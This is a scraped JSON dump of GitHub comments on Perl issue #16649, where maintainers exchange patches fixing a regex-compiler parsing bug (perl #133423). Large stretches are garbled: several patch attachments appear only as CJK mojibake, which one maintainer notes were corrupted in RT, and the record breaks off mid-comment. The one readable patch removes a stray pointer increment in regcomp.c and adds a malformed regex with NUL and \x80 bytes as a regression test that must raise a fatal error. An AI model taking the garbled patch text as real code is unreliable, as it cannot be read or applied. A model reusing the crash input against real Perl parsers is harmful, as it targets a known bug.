⭭礠③畧ㄳ㌴㈳‽•⠿嬨㽞㨨㽛屜屸〰崩⥜屝屸〰簲孞幝屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰屸㠰崩刮屜㘷〢㬊⬊‣⌊‣⌠䭥礭癡汵攠灡楲猠潦潤支敲牯爠潦潤攠瑨慴桯畬搠桡癥慴慬牲潲献ਠ⌣ੀ䀠ⴲ㤰ⰶ㈹㈬㠠䁀礠䁤敡瑨‽ਠ‧⼨㽸浳楸瀩慢振✠㴾•∬ਠ‧⼨㽸硸砺慢挩⼧‽㸠∢Ⰺ†✯⠿㰽⼧‽㸠❓敱略湣攠⠿⸮⸠湯琠瑥牭楮慴敤⁻⍽⼨㼼㵻⍽⼧Ⱐ†††††††††††‣⁛灥牬‣ㄲ㠱㜰崊⬠∯③畧ㄳ㌴㈳⼢‽㸠≏灥牡湤⁷楴栠湯⁰牥捥摩湧灥牡瑯爠笣素洯⠿嬨㽞㨨㽛屜]⤩屜笣絝|㉛幞嵜砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸ぜ砸そ⥒⹜尶㜰⼢Ⰺ⬊ \u2029㬊 ⴭ ㈮ㄷ⸱ਊ\u003c/pre\u003e\u003c/div\u003e\n\u003c/details\u003e","bodyVersion":"950ec8a0347d5434f3946c99d464b841669859c34233c99e693596d84b5e22f9","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097454","createdAt":"2018-09-24T18:01:56Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZgy-siAAqTU0NDA5NzQ1NA=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097455,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ1NQ==","body":"### From @khwilliamson\n\n\u003cdetails\u003e\u003csummary\u003e0003-PATCH-perl-133423-for-maint-5.28.patch\u003c/summary\u003e\n\n```diff\n牆浯〠㠴㔹愸㕡㌴㤷づ〲㌹㘲昸㔸戱㔵㍢敤戳㜴昵潍敓⁰㜱〠㨰〰〺‰〲䘊潲㩭䬠牡楗汬慩獭湯㰠桫䁷灣湡漮杲ਾ慄整›潍Ɱ㈠‴敓⁰〲㠱ㄠ㨱㔵㔺‵〭〶ਰ畓橢捥㩴嬠䅐䍔⁈⼳崳倠呁䡃›灛牥ㄣ㌳㈴崳映牯洠楡瑮㔠㈮ਸⴊⴭ 敲捧浯†††⁼‱ਭ琠爯⽥敲彧敭杳琮簠㌠⬠⬫ ′楦敬档湡敧Ɽ㌠椠獮牥楴湯⡳⤫‱敤敬楴湯搊晩ⴭ楧⁴⽡敲捧浯⽢敲捧浯湩敤⁸㙦㐹晦昷戸⸮ㅥ慤㔱㝡挷ㄠ〰㐶ⴭ⽡敲捧浯⬫⽢敲捧浯䁀ⴠ㔱㤵ⰱ‷ㄫ㔵ㄹ㘬䀠⁀敲潤损牵档牡††††††††††椠唨䡃剁呁刨硅彃慰獲⥥℠‽⤧⤧ ††††††††††††䙶䥁⡌䔢灸捥楴杮挠潬敳瀠牡湥映牯眠慲灰牥映牯渠獥整硥整摮摥挠慨捲慬獳⤢ਠ†††††††††删硅彃慰獲⭥㬫 ††††††††††䕒䍸晟慬獧㴠猠癡彥汦条㭳 ††††††††††潧潴栠湡汤彥灯牥湡㭤 ††††††††楤晦ⴠ札瑩愠琯爯⽥敲彧敭杳琮戠琯爯⽥敲彧敭杳琮椊摮硥㔠扦昱愱㘴㈮㠸戰㑥攵〱㘰㐴ⴊⴭ愠琯爯⽥敲彧敭杳琮⬊⬫戠琯爯⽥敲彧敭杳琮䀊⁀ㄭ㈲㘬⬠㈱ⰲ‸䁀洠⁹琤扡桟硥㴠猠牰湩晴∠〥堲Ⱒ漠摲∨瑜⤢⌠ ‣桔楦獲⁴敳⁴牡桴獯桴瑡猠潨汵敢映瑡污攠牲牯 ⬊祭␠畢ㅧ㌳㈴″‽⠢嬿㼨㩞㼨屛屜へ崰⤩屜屝へ簰嬲幞屝㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸崰利尮㙜〷㬢⬊ 祭䀠敤瑡⠠ ✠嬯㵛潦㵯嵝✯㴠‾倧协塉猠湹慴⁸㵛㴠⁝獩爠獥牥敶潦畦畴敲攠瑸湥楳湯⍻⁽⽭孛昽潯崽⍻嵽✯ਬ䁀ⴠ〳ⰷ‶㌫㤰㜬䀠⁀祭䀠敤瑡†⼧䅜⽻‧㸽✠湕獥慣数敬瑦戠慲散椠敲敧⁸獩椠汬来污栠牥⍻⁽⽭䅜筻紣✯ਬ†⼧㼨㴼✯㴠‾匧煥敵据㼨⸮潮⁴整浲湩瑡摥笠紣洠⠯㰿笽紣✯†††††††††††⌠嬠数汲⌠㈱ㄸ〷†⼧灜登牥楴慣慴絢✯㴠‾䌧湡❜⁴楦摮唠楮潣敤瀠潲数瑲⁹敤楦楮楴湯∠敶瑲捩污ଠ琠扡•⍻⁽⽭屜筰敶瑲捩污ଠ琠扡筽紣✯‣灛牥ㄣ㈳㔰崵⬊∠畢ㅧ㌳㈴⼳•㸽∠灏牥湡楷桴渠牰捥摥湩灯牥瑡牯笠紣洠⠯嬿㼨㩞㼨屛\\⥝尩筜紣]㉼幛嵞硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸⥝⹒屜㜶⼰Ⱒ 㬩 ⴊ㈊ㄮ⸷\n```\n\u003c/details\u003e\n","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/khwilliamson/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/khwilliamson\"\u003e@khwilliamson\u003c/a\u003e\u003c/h3\u003e\n\u003cdetails\u003e\u003csummary\u003e0003-PATCH-perl-133423-for-maint-5.28.patch\u003c/summary\u003e\n\u003cdiv class=\"highlight highlight-source-diff notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"牆浯〠㠴㔹愸㕡㌴㤷づ〲㌹㘲昸㔸戱㔵㍢敤戳㜴昵潍敓⁰㜱〠㨰〰〺‰〲䘊潲㩭䬠牡楗汬慩獭湯㰠桫䁷灣湡漮杲ਾ慄整›潍Ɱ㈠‴敓⁰〲㠱ㄠ㨱㔵㔺‵〭〶ਰ畓橢捥㩴嬠䅐䍔⁈⼳崳倠呁䡃›灛牥ㄣ㌳㈴崳映牯洠楡瑮㔠㈮ਸⴊⴭ 敲捧浯†††⁼‱ਭ琠爯⽥敲彧敭杳琮簠㌠⬠⬫ ′楦敬档湡敧Ɽ㌠椠獮牥楴湯⡳⤫‱敤敬楴湯搊晩ⴭ楧⁴⽡敲捧浯⽢敲捧浯湩敤⁸㙦㐹晦昷戸⸮ㅥ慤㔱㝡挷ㄠ〰㐶ⴭ⽡敲捧浯⬫⽢敲捧浯䁀ⴠ㔱㤵ⰱ‷ㄫ㔵ㄹ㘬䀠⁀敲潤损牵档牡††††††††††椠唨䡃剁呁刨硅彃慰獲⥥℠‽⤧⤧ ††††††††††††䙶䥁⡌䔢灸捥楴杮挠潬敳瀠牡湥映牯眠慲灰牥映牯渠獥整硥整摮摥挠慨捲慬獳⤢ਠ†††††††††删硅彃慰獲⭥㬫 ††††††††††䕒䍸晟慬獧㴠猠癡彥汦条㭳 ††††††††††潧潴栠湡汤彥灯牥湡㭤 ††††††††楤晦ⴠ札瑩愠琯爯⽥敲彧敭杳琮戠琯爯⽥敲彧敭杳琮椊摮硥㔠扦昱愱㘴㈮㠸戰㑥攵〱㘰㐴ⴊⴭ愠琯爯⽥敲彧敭杳琮⬊⬫戠琯爯⽥敲彧敭杳琮䀊⁀ㄭ㈲㘬⬠㈱ⰲ‸䁀洠⁹琤扡桟硥㴠猠牰湩晴∠〥堲Ⱒ漠摲∨瑜⤢⌠ ‣桔楦獲⁴敳⁴牡桴獯桴瑡猠潨汵敢映瑡污攠牲牯 ⬊祭␠畢ㅧ㌳㈴″‽⠢嬿㼨㩞㼨屛屜へ崰⤩屜屝へ簰嬲幞屝㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸崰利尮㙜〷㬢⬊ 祭䀠敤瑡⠠ ✠嬯㵛潦㵯嵝✯㴠‾倧协塉猠湹慴⁸㵛㴠⁝獩爠獥牥敶潦畦畴敲攠瑸湥楳湯⍻⁽⽭孛昽潯崽⍻嵽✯ਬ䁀ⴠ〳ⰷ‶㌫㤰㜬䀠⁀祭䀠敤瑡†⼧䅜⽻‧㸽✠湕獥慣数敬瑦戠慲散椠敲敧⁸獩椠汬来污栠牥⍻⁽⽭䅜筻紣✯ਬ†⼧㼨㴼✯㴠‾匧煥敵据㼨⸮潮⁴整浲湩瑡摥笠紣洠⠯㰿笽紣✯†††††††††††⌠嬠数汲⌠㈱ㄸ〷†⼧灜登牥楴慣慴絢✯㴠‾䌧湡❜⁴楦摮唠楮潣敤瀠潲数瑲⁹敤楦楮楴湯∠敶瑲捩污ଠ琠扡•⍻⁽⽭屜筰敶瑲捩污ଠ琠扡筽紣✯‣灛牥ㄣ㈳㔰崵⬊∠畢ㅧ㌳㈴⼳•㸽∠灏牥湡楷桴渠牰捥摥湩灯牥瑡牯笠紣洠⠯嬿㼨㩞㼨屛\\⥝尩筜紣]㉼幛嵞硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸⥝⹒屜㜶⼰Ⱒ 㬩 ⴊ㈊ㄮ⸷\"\u003e\u003cpre class=\"notranslate\"\u003e牆浯〠㠴㔹愸㕡㌴㤷づ〲㌹㘲昸㔸戱㔵㍢敤戳㜴昵潍敓⁰㜱〠㨰〰〺‰〲䘊潲㩭䬠牡楗汬慩獭湯㰠桫䁷灣湡漮杲ਾ慄整›潍Ɱ㈠‴敓⁰〲㠱ㄠ㨱㔵㔺‵〭〶ਰ畓橢捥㩴嬠䅐䍔⁈⼳崳倠呁䡃›灛牥ㄣ㌳㈴崳映牯洠楡瑮㔠㈮ਸⴊⴭ 敲捧浯†††⁼‱ਭ琠爯⽥敲彧敭杳琮簠㌠⬠⬫ ′楦敬档湡敧Ɽ㌠椠獮牥楴湯⡳⤫‱敤敬楴湯搊晩ⴭ楧⁴⽡敲捧浯⽢敲捧浯湩敤⁸㙦㐹晦昷戸⸮ㅥ慤㔱㝡挷ㄠ〰㐶ⴭ⽡敲捧浯⬫⽢敲捧浯䁀ⴠ㔱㤵ⰱ‷ㄫ㔵ㄹ㘬䀠⁀敲潤损牵档牡††††††††††椠唨䡃剁呁刨硅彃慰獲⥥℠‽⤧⤧ ††††††††††††䙶䥁⡌䔢灸捥楴杮挠潬敳瀠牡湥映牯眠慲灰牥映牯渠獥整硥整摮摥挠慨捲慬獳⤢ਠ†††††††††删硅彃慰獲⭥㬫 ††††††††††䕒䍸晟慬獧㴠猠癡彥汦条㭳 ††††††††††潧潴栠湡汤彥灯牥湡㭤 ††††††††楤晦ⴠ札瑩愠琯爯⽥敲彧敭杳琮戠琯爯⽥敲彧敭杳琮椊摮硥㔠扦昱愱㘴㈮㠸戰㑥攵〱㘰㐴ⴊⴭ愠琯爯⽥敲彧敭杳琮⬊⬫戠琯爯⽥敲彧敭杳琮䀊⁀ㄭ㈲㘬⬠㈱ⰲ‸䁀洠⁹琤扡桟硥㴠猠牰湩晴∠〥堲Ⱒ漠摲∨瑜⤢⌠ ‣桔楦獲⁴敳⁴牡桴獯桴瑡猠潨汵敢映瑡污攠牲牯 ⬊祭␠畢ㅧ㌳㈴″‽⠢嬿㼨㩞㼨屛屜へ崰⤩屜屝へ簰嬲幞屝㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸尰㡸崰利尮㙜〷㬢⬊ 祭䀠敤瑡⠠ ✠嬯㵛潦㵯嵝✯㴠‾倧协塉猠湹慴⁸㵛㴠⁝獩爠獥牥敶潦畦畴敲攠瑸湥楳湯⍻⁽⽭孛昽潯崽⍻嵽✯ਬ䁀ⴠ〳ⰷ‶㌫㤰㜬䀠⁀祭䀠敤瑡†⼧䅜⽻‧㸽✠湕獥慣数敬瑦戠慲散椠敲敧⁸獩椠汬来污栠牥⍻⁽⽭䅜筻紣✯ਬ†⼧㼨㴼✯㴠‾匧煥敵据㼨⸮潮⁴整浲湩瑡摥笠紣洠⠯㰿笽紣✯†††††††††††⌠嬠数汲⌠㈱ㄸ〷†⼧灜登牥楴慣慴絢✯㴠‾䌧湡❜⁴楦摮唠楮潣敤瀠潲数瑲⁹敤楦楮楴湯∠敶瑲捩污ଠ琠扡•⍻⁽⽭屜筰敶瑲捩污ଠ琠扡筽紣✯‣灛牥ㄣ㈳㔰崵⬊∠畢ㅧ㌳㈴⼳•㸽∠灏牥湡楷桴渠牰捥摥湩灯牥瑡牯笠紣洠⠯嬿㼨㩞㼨屛\\⥝尩筜紣]㉼幛嵞硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸硜〸⥝⹒屜㜶⼰Ⱒ 㬩 ⴊ㈊ㄮ⸷\u003c/pre\u003e\u003c/div\u003e\n\u003c/details\u003e","bodyVersion":"549b8fcf62780847054ff7e56b637233cf1a41a4eb7039880016fa04576b4a3b","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097455","createdAt":"2018-09-24T18:01:56Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZgy-siAAqTU0NDA5NzQ1NQ=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097458,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ1OA==","body":"### From @tonycoz\n\nOn Mon\\, 24 Sep 2018 11\u0026#8203;:01\u0026#8203;:56 \\-0700\\, public@\u0026#8203;khwilliamson\\.com wrote\u0026#8203;:\n\u003e On 09/19/2018 06\u0026#8203;:28 PM\\, Tony Cook via RT wrote\u0026#8203;:\n\u003e \u003e\n\u003e \u003e Could you please make patches against blead/maint\\-5\\.28/maint\\-5\\.26 for\n\u003e \u003e this?\n\u003e \n\u003e Attached\n\nThanks\\, though they seem to be corrupted in RT\\, trying again\\.\n\nTony","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/tonycoz/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/tonycoz\"\u003e@tonycoz\u003c/a\u003e\u003c/h3\u003e\n\u003cp dir=\"auto\"\u003eOn Mon, 24 Sep 2018 11:01:56 -0700, public@khwilliamson.com wrote:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eOn 09/19/2018 06:28 PM, Tony Cook via RT wrote:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003eCould you please make patches against blead/maint-5.28/maint-5.26 for\u003cbr\u003e\nthis?\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eAttached\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp dir=\"auto\"\u003eThanks, though they seem to be corrupted in RT, trying again.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eTony\u003c/p\u003e","bodyVersion":"a54365cf32c4268e64b07eee468af61ed63bf660e52ca4c0b29b5b58782d4f6f","viewerCanUpdate":false,"url":"https://github.com/Perl/perl5/issues/16649#issuecomment-544097458","createdAt":"2018-09-25T04:44:29Z","authorAssociation":"NONE","viewerCanDelete":false,"viewerCanMinimize":false,"viewerCanReport":false,"viewerCanReportToMaintainer":false,"viewerCanBlockFromOrg":false,"viewerCanUnblockFromOrg":false,"isHidden":false,"minimizedReason":null,"showSpammyBadge":false,"createdViaEmail":false,"authorToRepoOwnerSponsorship":null,"repository":{"id":"MDEwOlJlcG9zaXRvcnk4MTgzNTcw","name":"perl5","owner":{"__typename":"Organization","id":"MDEyOk9yZ2FuaXphdGlvbjM1ODU0MTE=","login":"Perl","url":"https://github.com/Perl"},"isPrivate":false,"slashCommandsEnabled":false,"nameWithOwner":"Perl/perl5","databaseId":8183570},"__isComment":"IssueComment","viewerCanReadUserContentEdits":true,"lastEditedAt":null,"lastUserContentEdit":null,"__isReactable":"IssueComment","reactionGroups":[{"content":"THUMBS_UP","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"THUMBS_DOWN","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"LAUGH","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HOORAY","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"CONFUSED","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"HEART","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"ROCKET","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}},{"content":"EYES","viewerHasReacted":false,"reactors":{"totalCount":0,"nodes":[]}}],"__isNode":"IssueComment"},"cursor":"Y3Vyc29yOnYyOpPPAAABZg8K98gAqTU0NDA5NzQ1OA=="},{"node":{"__typename":"IssueComment","__isIssueTimelineItems":"IssueComment","databaseId":544097459,"viewerDidAuthor":false,"issue":{"author":{"__typename":"User","login":"p5pRT","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDU6SXNzdWU1MDkzOTQ5NjA=","number":16649,"locked":false,"databaseId":509394960},"author":{"__typename":"User","login":"p5pRT","avatarUrl":"https://avatars.githubusercontent.com/u/51798018?u=c0c9dec90db4d6102e88553f891e56b4bb45370e\u0026v=4","id":"MDQ6VXNlcjUxNzk4MDE4"},"id":"MDEyOklzc3VlQ29tbWVudDU0NDA5NzQ1OQ==","body":"### From @tonycoz\n\n\u003cdetails\u003e\u003csummary\u003e0003-PATCH-perl-133423-for-maint-5.28.patch\u003c/summary\u003e\n\n```diff\nFrom 048958aa54379e02093268f851b55b3de3b475fe Mon Sep 17 00:00:00 2001\nFrom: Karl Williamson \u003ckhw@cpan.org\u003e\nDate: Mon, 24 Sep 2018 11:55:55 -0600\nSubject: [PATCH 3/3] PATCH: [perl #133423] for maint 5.28\n\n---\n regcomp.c | 1 -\n t/re/reg_mesg.t | 3 +++\n 2 files changed, 3 insertions(+), 1 deletion(-)\n\ndiff --git a/regcomp.c b/regcomp.c\nindex f694ff7f8b..e1da15a77c 100644\n--- a/regcomp.c\n+++ b/regcomp.c\n@@ -15591,7 +15591,6 @@ redo_curchar:\n if (UCHARAT(RExC_parse) != ')')\n vFAIL(\"Expecting close paren for wrapper for nested extended charclass\");\n \n- RExC_parse++;\n RExC_flags = save_flags;\n goto handle_operand;\n }\ndiff --git a/t/re/reg_mesg.t b/t/re/reg_mesg.t\nindex 5fb1f1a46c..2880be45eb 100644\n--- a/t/re/reg_mesg.t\n+++ b/t/re/reg_mesg.t\n@@ -122,6 +122,8 @@ my $tab_hex = sprintf \"%02X\", ord(\"\\t\");\n #\n # The first set are those that should be fatal errors.\n \n+my $bug133423 = \"(?[(?^:(?[\\\\\\x00]))\\\\]\\x00|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670\";\n+\n my @death =\n (\n '/[[=foo=]]/' =\u003e 'POSIX syntax [= =] is reserved for future extensions {#} m/[[=foo=]{#}]/',\n@@ -307,6 +309,7 @@ my @death =\n '/\\A{/' =\u003e 'Unescaped left brace in regex is illegal here {#} m/\\A{{#}/',\n '/(?\u003c=/' =\u003e 'Sequence (?... not terminated {#} m/(?\u003c={#}/', # [perl #128170]\n '/\\p{vertical \u000B tab}/' =\u003e 'Can\\'t find Unicode property definition \"vertical \u000B tab\" {#} m/\\\\p{vertical \u000B tab}{#}/', # [perl #132055]\n+ \"/$bug133423/\" =\u003e \"Operand with no preceding operator {#} m/(?[(?^:(?[\\\\\u0000]))\\\\{#}]\u0000|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670/\",\n \n );\n \n-- \n2.17.1\n\n\n```\n\u003c/details\u003e\n","bodyHTML":"\u003ch3 dir=\"auto\"\u003eFrom \u003ca class=\"user-mention notranslate\" data-hovercard-type=\"user\" data-hovercard-url=\"/users/tonycoz/hovercard\" data-octo-click=\"hovercard-link-click\" data-octo-dimensions=\"link_type:self\" href=\"https://github.com/tonycoz\"\u003e@tonycoz\u003c/a\u003e\u003c/h3\u003e\n\u003cdetails\u003e\u003csummary\u003e0003-PATCH-perl-133423-for-maint-5.28.patch\u003c/summary\u003e\n\u003cdiv class=\"highlight highlight-source-diff notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"From 048958aa54379e02093268f851b55b3de3b475fe Mon Sep 17 00:00:00 2001\nFrom: Karl Williamson \u0026lt;khw@cpan.org\u0026gt;\nDate: Mon, 24 Sep 2018 11:55:55 -0600\nSubject: [PATCH 3/3] PATCH: [perl #133423] for maint 5.28\n\n---\n regcomp.c | 1 -\n t/re/reg_mesg.t | 3 +++\n 2 files changed, 3 insertions(+), 1 deletion(-)\n\ndiff --git a/regcomp.c b/regcomp.c\nindex f694ff7f8b..e1da15a77c 100644\n--- a/regcomp.c\n+++ b/regcomp.c\n@@ -15591,7 +15591,6 @@ redo_curchar:\n if (UCHARAT(RExC_parse) != ')')\n vFAIL(\u0026quot;Expecting close paren for wrapper for nested extended charclass\u0026quot;);\n \n- RExC_parse++;\n RExC_flags = save_flags;\n goto handle_operand;\n }\ndiff --git a/t/re/reg_mesg.t b/t/re/reg_mesg.t\nindex 5fb1f1a46c..2880be45eb 100644\n--- a/t/re/reg_mesg.t\n+++ b/t/re/reg_mesg.t\n@@ -122,6 +122,8 @@ my $tab_hex = sprintf \u0026quot;%02X\u0026quot;, ord(\u0026quot;\\t\u0026quot;);\n #\n # The first set are those that should be fatal errors.\n \n+my $bug133423 = \u0026quot;(?[(?^:(?[\\\\\\x00]))\\\\]\\x00|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670\u0026quot;;\n+\n my @death =\n (\n '/[[=foo=]]/' =\u0026gt; 'POSIX syntax [= =] is reserved for future extensions {#} m/[[=foo=]{#}]/',\n@@ -307,6 +309,7 @@ my @death =\n '/\\A{/' =\u0026gt; 'Unescaped left brace in regex is illegal here {#} m/\\A{{#}/',\n '/(?\u0026lt;=/' =\u0026gt; 'Sequence (?... not terminated {#} m/(?\u0026lt;={#}/', # [perl #128170]\n '/\\p{vertical � tab}/' =\u0026gt; 'Can\\'t find Unicode property definition \u0026quot;vertical � tab\u0026quot; {#} m/\\\\p{vertical � tab}{#}/', # [perl #132055]\n+ \u0026quot;/$bug133423/\u0026quot; =\u0026gt; \u0026quot;Operand with no preceding operator {#} m/(?[(?^:(?[\\\\�]))\\\\{#}]�|2[^^]\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80\\x80])R.\\\\670/\u0026quot;,\n \n );\n \n-- 